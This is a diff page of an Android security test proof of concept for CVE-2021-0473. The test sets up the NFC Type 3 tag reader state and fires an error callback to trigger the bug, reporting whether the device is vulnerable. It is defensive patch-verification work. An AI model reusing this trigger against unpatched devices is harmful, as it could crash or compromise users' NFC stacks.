diff options
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp | 40 |
1 files changed, 22 insertions, 18 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp index d7650ad4d5f..152f5384323 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp @@ -92,27 +92,31 @@ void GKI_freebuf(void *ptr) { } int main() { - tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t; + tNFC_ACTIVATE_DEVT p_activate_params = {}; + p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP; + p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A; + RW_SetActivatedTagType(&p_activate_params, &poc_cback); + FAIL_CHECK(rw_cb.p_cback == &poc_cback); - GKI_init(); - rw_init(); - rw_cb.p_cback = &poc_cback; + tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t; - uint8_t peerNfcID[NCI_RF_F_UID_LEN]; - uint8_t mrtiCheck = 1, mrtiUpdate = 1; - if (rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) != NFC_STATUS_OK) { - return EXIT_FAILURE; - } + GKI_init(); + rw_init(); + rw_cb.p_cback = &poc_cback; + + uint8_t peerNfcID[NCI_RF_F_UID_LEN]; + uint8_t mrtiCheck = 1, mrtiUpdate = 1; + FAIL_CHECK(rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) == NFC_STATUS_OK); - tNFC_CONN p_data = {}; - NFC_HDR nfcHdr = {}; - p_data.data.p_data = &nfcHdr; + tNFC_CONN p_data = {}; + NFC_HDR nfcHdr = {}; + p_data.data.p_data = &nfcHdr; - tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; - p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING; + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING; - uint8_t conn_id = NFC_RF_CONN_ID; - tNFC_CONN_EVT event = NFC_ERROR_CEVT; - p_cb->p_cback(conn_id, event, &p_data); - return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS; + uint8_t conn_id = NFC_RF_CONN_ID; + tNFC_CONN_EVT event = NFC_ERROR_CEVT; + p_cb->p_cback(conn_id, event, &p_data); + return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS; } |